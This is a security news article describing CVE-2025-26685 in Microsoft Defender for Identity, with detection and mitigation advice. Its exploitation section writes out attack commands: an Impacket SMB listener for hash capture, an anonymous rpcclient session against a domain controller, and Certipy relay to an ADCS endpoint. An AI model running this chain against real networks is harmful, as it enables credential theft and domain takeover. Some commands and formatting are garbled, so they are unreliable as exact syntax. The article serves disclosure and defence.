Microsoft Defender Spoofing Flaw Enables Privilege Escalation and AD Access
A newly disclosed spoofing vulnerability (CVE-2025-26685) in Microsoft Defender for Identity (MDI) enables unauthenticated attackers to capture Net-NTLM hashes of critical Directory Service Accounts (DSAs), potentially compromising Active Directory environments.
Rated 6.5 (Medium) on the CVSS v3.1 scale, this flaw exploits MDI’s Lateral Movement Paths (LMPs) feature and has been actively addressed in Microsoft’s May 2025 Patch Tuesday updates.
Technical Breakdown
According to the report, the vulnerability stems from MDI’s use of SAM-R protocol queries to map LMPs—security features designed to visualize privilege escalation paths in Active Directory.
Attackers can trigger these queries by initiating anonymous SMB connections to Domain Controllers, forcing the MDI sensor to authenticate via NTLM instead of Kerberos.
Key Exploitation Requirements:
- Attacker-controlled system with a DNS record (often auto-generated via Windows DHCP)
- Generation of Windows Event ID 4672 on Domain Controllers during SMB null session attempts1
Exploitation Workflow
Attackers leverage tools like Impacket and Certipy to execute a multi-stage attack:
- Hash Capture
bash# Initiate SMB listener
impacket-smbserver share $(pwd) -smb2support
# Trigger MDI sensor via SMB null session
rpcclient -U "" -N 10.0.0.1
This forces the MDI sensor’s DSA to authenticate, exposing its Net-NTLMv1/v2 hash.
- Hash Relaying (via ESC8 Vulnerability)
bash# Relay hash to ADCS Web Enrollment endpoint
certipy relay -target http://adcs-ca.domain.local
# Request certificate for DSA
certipy auth -pfx dsa_cert.pfx -dc-ip 10.0.0.1
Successful relaying grants attackers DSA privileges, enabling lateral movement.
Impact Analysis
| Component | Risk |
|---|---|
| DSA Accounts | Privilege escalation via hash cracking/relaying |
| Certificate Authority | Malicious certificate issuance |
| Lateral Movement | Unrestricted access to mapped LMPs |
The DSA’s default permissions—including read access to Active Directory’s Deleted Objects Container—allow attackers to reconstruct AD topology and identify high-value targets.
Detection Strategies
Microsoft recommends monitoring for:
- Anomalous DSA Authentication
- Windows Event ID 4624 from non-Domain Controller IPs1
- ADCS Template Enumeration text
(objectClass=certificationAuthority)(objectclass=pKICertificateTemplate) - Certificate-Based TGT Requests
- Windows Event ID 4768 with pre-authentication type 161
| Solution | Classic MDI Sensor | Unified XDR Sensor |
|---|---|---|
| Authentication Protocol | SAM-R (NTLM/Kerberos) | WMI (Kerberos-only) |
| LMP Mapping Method | Local Admin Queries | Behavioral Analytics |
| Vulnerability Status | Affected | Not Vulnerable |
Microsoft mandates migration to XDR sensors (v3. x+) and suggests:
- Replacing standard DSA accounts with Group Managed Service Accounts (gMSAs)
- Disabling LMPs via support request if incompatible with the infrastructure
powershell# Convert DSA to gMSA
New-MDIDSA -Identity "DefenderIdentity" -ForceStandardAccount:$false
This vulnerability highlights the risks of over-permissioned service accounts in security products.
While patches mitigate immediate threats, organizations must audit third-party security tools’ AD integrations and enforce strict NTLM relay protections.
The intersection of MDI’s LMPs and ADCS vulnerabilities demonstrates how chained exploits can turn medium-severity flaws into domain-wide compromises.